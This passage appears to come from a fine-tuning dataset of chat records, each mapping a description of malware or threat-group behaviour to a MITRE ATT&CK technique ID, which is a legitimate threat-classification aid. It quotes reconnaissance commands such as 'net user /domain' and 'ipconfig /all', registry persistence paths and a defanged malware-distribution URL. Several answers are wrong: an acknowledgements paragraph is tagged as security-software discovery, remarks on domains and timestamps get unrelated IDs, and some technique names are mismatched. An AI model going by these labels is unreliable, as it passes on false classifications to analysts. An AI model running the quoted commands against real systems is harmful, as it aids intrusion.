"user", "content": "Milan can run `C:\\Windows\\system32\\cmd.exe /c cmd /c ipconfig /all 2>&1` to discover network settings." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collected data from local victim systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The older “mode” variant of BitPaymer uses the Windows registry for persistence, while the newer service variant will attempt to install itself as a service" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can crash a debugger by passing a format string to \"OutputDebugStringA()\"." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can gather information about the user on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can use Rundll32 to execute additional payloads." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts exfiltrated data with RC4." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Poseidon Group obtains and saves information about victim network interfaces and addresses." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT12 has used blogs and WordPress for C2 infrastructure." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Regin appears to have functionality to modify remote Registry information." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aoqin Dragon has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.\tUrsnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "scripts save memory dump data into a specific directory on hosts in the victim environment." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kerrdown can download additional software including Cobalt Strike from servers on the victim's network." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Build Tool Most of CARBANAK’s strings are encrypted in order to make analysis more difficult" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT has command line access." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 routinely removed their tools, including custom backdoors, once remote access was achieved. APT29 has also used SDelete to remove artifacts from victims." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM can search for anti-virus products on the system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neither this new domain nor the IP it resolves to have been observed in the past, indicating that the sample in Table 3 may be associated with a newer campaign" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT has a module for performing remote desktop access." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the users of the system." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team used the \"sp_addlinkedsrvlogin\" command in MS-SQL to create a link between a created account and other servers in the network." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems." }, { "role": "assistant", "content": "T1187 - Forced Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 injects its malware variant, ROKRAT, into the cmd.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "an executable (also compressed, i.e. zip, rar or cab archive), sometimes pretending to be a different file format, like Dyreza - a document (commonly PDF or some MS Office format ) – like this Dridex downloader" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All the strings and settings were encrypted and obfuscated" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover the system time by using the \"net time\" command." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MechaFlounder has the ability to use HTTP in communication with C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POSHSPY uses PowerShell to execute various commands, one to execute its payload." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims." }, { "role": "assistant", "content": "T1056.002 - Input Capture: GUI Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers product names from the Registry key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName and the processor description from the Registry key HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor has been signed with valid certificates to evade detection by security tools." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actor then tested connectivity to an IP managed by the victim’s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim’s SOGU backdoor. This effectively routes SOGU malware traffic through the victim’s service provider, which likely indicates a foothold on the service provider’s network. The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Analysis of their configurations show that the C2 servers used both fully-qualified domain names and IP addresses" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper may attempt to establish persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\" run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avira’s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira’s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1049 - System Network Connections Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1057 - Process Discovery', 'T1016 - System Network Configuration Discovery', 'T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon’s operators" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The spear phishing emails and attached malicious macro documents typically have geopolitical themes" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can collect the OS, and build version on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, on that same url, http://mdzz2019.noip[.]cn:3654/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team used UPX to pack a copy of Mimikatz." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can use Native API to create a new process and to start services." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot has the ability to execute arbitrary commands via `cmd.exe`." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver installs itself as a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keydnap uses HTTPS for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. This feature explains why we discovered several samples with different sets of credentials that were collected from previously infected systems. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - ▼ February (14) CannibalRAT targets Brazil Who Wasn’t Responsible for Olympic Destroyer" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BloodHound can enumerate and collect the properties of domain computers, including domain controllers." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chrommme can encrypt and store on disk collected data before exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "replaces the Sticky Keys binary C:\\Windows\\System32\\sethc.exe for persistence." }, { "role": "assistant", "content": "T1546.008 - Event Triggered Execution: Accessibility Features" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor has manipulated the time of last access to files and registry keys after they have been created or modified." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets." }, { "role": "assistant", "content": "T1561.001 - Disk Content Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zox can enumerate attached drives." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adds a Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "What does the Poseidon Group do? What happens after a target machine is infected? Once the target’s machine is compromised, the attacker first enumerates all processes running in the system and all services" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has performed file deletion to evade detection." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1518.001 - Software Discovery: Security Software Discovery', 'T1033 - System Owner/User Discovery', 'T1082 - System Information Discovery', 'T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY has the ability to set a Registry key to run a cmd.exe command." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can can remove all system restore points." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury can list directory entries." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThreatNeedle can collect system profile information from a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can identify logged in users across the domain and views user sessions." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use PowerSploit's \"Invoke-TokenManipulation\" to manipulate access tokens." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Regin malware platform supports many standard protocols, including SMB." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging', 'T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These four were then all modified on the same date and time on October 13, 2018 08:21" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neoichor can use HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the documents is called “همبستگی عاشقانه با عاشقان آزادی2.doc” (translates from Persian as “Romantic Solidarity With Lovers of Freedom2.doc”) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used LinkedIn to send spearphishing links." }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has 